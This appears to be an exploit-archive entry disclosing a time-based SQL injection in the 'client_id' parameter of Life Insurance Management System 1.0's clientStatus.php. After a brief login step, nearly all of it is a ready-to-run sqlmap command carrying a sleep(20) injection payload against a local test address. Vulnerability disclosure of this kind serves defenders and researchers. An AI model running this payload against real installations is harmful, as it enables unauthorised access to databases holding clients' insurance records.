id: 35691
date: 01/18/2021
title: Life Insurance Management System 1.0 - (client_id) SQL Injection Vulnerability
author: Aitor Herrero
cves: 

# Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection
# Exploit Author: Aitor Herrero
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html
# Version: 1.0
# Tested on: Windows /linux /

Login in the application

Go to clientStatus.php?client_id=

sqlmap -u "http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1
<http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271>"


#  0day.today [2023-03-25]  #